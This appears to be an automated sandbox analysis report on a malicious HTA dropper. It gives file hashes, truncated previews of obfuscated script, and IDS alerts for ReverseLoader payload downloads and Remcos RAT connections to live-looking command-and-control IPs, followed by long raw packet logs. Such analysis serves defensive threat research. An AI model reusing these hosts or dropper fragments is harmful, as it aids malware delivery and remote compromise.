                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (3339), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):154166
                                                                          Entropy (8bit):3.8156717997547034
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3NscwvBFt3FR3fYwD5PNscwvBFt3FR3fYwDBNscwvBFt3FR3fYwDq:gvB3FR3fYwD5ovB3FR3fYwDivB3FR3fQ
                                                                          MD5:622118455F9B3D92190EDECB9F5A70E4
                                                                          SHA1:EC47A3F75A1A3E197A2745F75015160DA5190D76
                                                                          SHA-256:D9B6D65CD5E6206CCB41A4D12A0A1CF8D55DE31D786CF085D9632E5EAF66914A
                                                                          SHA-512:3AF7582CD5B8E7DDD5C23F5477FA3F595FDB851E0B7FAF51F167C716B0A50CA4CC6AF824B8409CA5745CCC72BC56BBFE201C3B6A7630F04A6E2E84EE248BCF91
                                                                          Malicious:true
                                                                          Preview:...... . . . .....L.l.L.R.U.l.K.G.L.W.i.L.c.c.K. .=. .".K.r.c.L.O.l.G.z.P.L.C.k.Z.f.U.".....c.l.k.q.k.t.W.G.o.p.h.N.K.Q.b. .=. .".H.P.A.a.Z.u.p.f.G.G.K.f.n.q.Q.".....m.i.q.N.Q.Q.p.i.x.B.L.B.K.s.U. .=. .".c.f.e.m.u.x.c.L.K.m.p.A.q.L.c.".........k.e.c.L.N.W.K.U.P.W.z.s.K.i.A. .=. .".T.U.d.k.T.u.L.H.f.z.W.K.K.P.L.".....z.x.K.c.Z.k.U.K.v.R.q.i.G.j.Z. .=. .".f.i.L.p.W.h.h.d.c.K.U.o.c.K.C.".....k.c.i.U.W.K.H.R.q.Q.J.C.P.z.x. .=. .".B.d.U.i.f.R.f.C.P.c.f.o.P.e.G.".....G.c.i.W.B.p.t.q.k.e.z.g.b.b.z. .=. .".u.u.Z.u.R.c.R.B.U.L.k.p.f.K.N.".....T.m.b.N.U.R.W.k.Z.p.I.U.K.Z.L. .=. .".d.z.c.f.m.k.G.f.Q.n.G.n.N.L.u.".....k.J.c.Q.n.c.e.B.o.a.q.H.Z.i.l. .=. .".W.G.a.i.W.z.W.a.t.R.R.L.A.f.h.".....a.t.G.a.o.U.p.U.u.U.f.l.A.i.G. .=. .".U.P.c.n.g.W.m.L.N.G.W.W.Z.S.v.".....k.g.o.B.o.c.q.e.c.r.m.e.k.n.c. .=. .".k.H.G.C.z.H.O.a.q.b.A.c.h.n.b.".....t.K.P.r.L.J.o.N.i.m.H.m.a.h.o. .=. .".i.p.Z.R.O.U.C.c.t.u.k.W.O.z.m.".....e.G.B.k.U.R.e.G.c.Z.s.l.h.W.z. .=. .".n.p.A.a.K.h.G.x.W.c.S.q.L.c.f.".....c.p.e.L.a.L.i.W.
                                                                          File type:HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
                                                                          Entropy (8bit):2.6745238831735283
                                                                          TrID:
                                                                            File name:sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
                                                                            File size:147'796 bytes
                                                                            MD5:920910732ff13da38fab9224e65041d6
                                                                            SHA1:844226d370dc471fa282eaad9e8dabaf59963902
                                                                            SHA256:7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544
                                                                            SHA512:1efe02ba682bd628bacebebe8f283276c1ebc6db3bcc3956c59b840d3677d94a6ca18f95182daf8a5d1587a830b2a2cc69d6a9c31a2672c29f8aa294e19cebf7
                                                                            SSDEEP:768:t1EQuPoGCMum2oum2H5KUJDVUKhCoGVf/Atu360KuBxvmm0wYWzP9k4/k4/k4/kk:tG
                                                                            TLSH:64E34417C69FE438E6BB6AFFE73C9B365243ED01E88E494F099C05941EE258A713C944
                                                                            File Content Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-12-17T07:21:15.185736+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.44973023.95.235.2980TCP
                                                                            2024-12-17T07:21:26.187158+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.193.137443192.168.2.449731TCP
                                                                            2024-12-17T07:21:44.389034+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449738172.67.187.200443TCP
                                                                            2024-12-17T07:21:44.801573+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11172.67.187.200443192.168.2.449738TCP
                                                                            2024-12-17T07:21:44.801573+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21172.67.187.200443192.168.2.449738TCP
                                                                            2024-12-17T07:21:45.761639+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1172.67.187.200443192.168.2.449738TCP
                                                                            2024-12-17T07:21:57.084620+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449739192.169.69.266946TCP
                                                                            2024-12-17T07:22:08.564509+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740192.169.69.266946TCP
                                                                            2024-12-17T07:22:20.200940+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449753192.169.69.266946TCP
                                                                            2024-12-17T07:22:31.873036+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449784192.169.69.266946TCP
                                                                            2024-12-17T07:22:43.555999+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449810192.169.69.266946TCP
                                                                            2024-12-17T07:22:55.211999+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449838192.169.69.266946TCP
                                                                            2024-12-17T07:23:07.099862+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449866192.169.69.266946TCP
                                                                            2024-12-17T07:23:18.583642+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449892192.169.69.266946TCP
                                                                            2024-12-17T07:23:30.068736+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449921192.169.69.266946TCP
                                                                            2024-12-17T07:23:41.749565+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449949192.169.69.266946TCP
                                                                            2024-12-17T07:23:53.351952+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449975192.169.69.266946TCP
                                                                            2024-12-17T07:24:04.909511+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450004192.169.69.266946TCP
                                                                            2024-12-17T07:24:16.602389+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450018192.169.69.266946TCP
                                                                            2024-12-17T07:24:28.166564+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450019192.169.69.266946TCP
                                                                            2024-12-17T07:24:39.842936+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450020192.169.69.266946TCP
                                                                            2024-12-17T07:24:51.460414+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450021192.169.69.266946TCP
                                                                            2024-12-17T07:25:02.967464+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450022192.169.69.266946TCP
                                                                            2024-12-17T07:25:14.603911+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450023192.169.69.266946TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Dec 17, 2024 07:21:13.957499027 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:14.077326059 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:14.077414989 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:14.077642918 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:14.198519945 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185647011 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185671091 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185687065 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185703039 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185735941 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.185735941 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.185796022 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.185863018 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185878992 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185894966 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185909986 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.185956955 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.185956955 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.185988903 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.186005116 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.186053038 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.186115026 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.305649042 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.305691957 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.305749893 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.305751085 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.377902985 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.377989054 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.377990961 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.378104925 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.381827116 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.381968975 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.382019997 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.382019997 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.390084982 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.390194893 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.390227079 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.390366077 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.398569107 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.398605108 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.398725033 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.398725033 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.406908989 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.407035112 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.407063961 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.407120943 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.415407896 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.415481091 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.415530920 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.415530920 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.423703909 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.423780918 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.423844099 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.423928976 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.432069063 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.432140112 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.432185888 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.432240009 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.440515041 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.440630913 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.440653086 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.440691948 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.448864937 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.448934078 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.448939085 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.449023962 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.456500053 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.456571102 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.456624031 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.456696033 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.569816113 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.569859028 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.569952965 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.569997072 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.572247982 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.572314978 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.572371006 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.572436094 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.577234030 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.577348948 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.577385902 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.577425003 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.582319975 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.582375050 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.582505941 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.582505941 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.587467909 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.587533951 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.587568998 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.587676048 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.592101097 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.592192888 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.592233896 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.592233896 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.596843958 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.596955061 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.597012997 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.597100973 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.601665020 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.601732969 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.601758003 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.601854086 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.606551886 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.606569052 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.606854916 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.606854916 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.611258984 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.611330986 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.611500025 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.611615896 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.616111994 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.616199970 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.616204023 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.616305113 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.620877981 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.620959997 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.621135950 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.621241093 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.625763893 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.625869036 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.625933886 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.626000881 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.630799055 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.630853891 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.630938053 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.630960941 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.635560036 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.635618925 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.635664940 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.635664940 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.640305042 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.640391111 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.640399933 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.640636921 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.645088911 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.645181894 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.645193100 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.645291090 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.649753094 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.649849892 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.649914026 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.650181055 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.654762983 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.654817104 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.654849052 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.654902935 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.659552097 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.659647942 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.762151957 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.762208939 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.762279987 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.762279987 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.763952971 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.764045000 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.764265060 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.764265060 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.766999960 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.767081976 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.767452002 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.767523050 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.771003962 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.771099091 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.771152973 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.771198034 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.775218964 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.775274038 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.775331020 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.775331020 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.779050112 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.779200077 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.779220104 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.779256105 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.782898903 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.782954931 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.782980919 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.783039093 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.786483049 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.786525011 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.786554098 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.786602974 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.789984941 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.790100098 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.790110111 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.790150881 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.793842077 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.793869019 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.793899059 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.793993950 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.797420025 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.797489882 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.797501087 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.797540903 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.800929070 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.801055908 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.801105022 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.801177979 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.804730892 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.804757118 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.804909945 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.804909945 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.808377981 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.808423996 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.808454037 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.808471918 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.811964035 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.812035084 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.812088966 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.812088966 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.815851927 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.815908909 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.816056967 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.816056967 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.819216967 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.819292068 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.819350958 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.819406033 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.822967052 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.823096037 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.823111057 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.823277950 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.826519012 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.826600075 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.826654911 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.826724052 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.830133915 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.830248117 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.830338955 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.830338955 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.833812952 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.833868980 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.833884954 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.833936930 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.837469101 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.837528944 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.837552071 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.837702036 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.841212988 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.841321945 CET804973023.95.235.29192.168.2.4
                                                                            Dec 17, 2024 07:21:15.841367960 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.841367960 CET4973080192.168.2.423.95.235.29
                                                                            Dec 17, 2024 07:21:15.844788074 CET804973023.95.235.29192.168.2.4
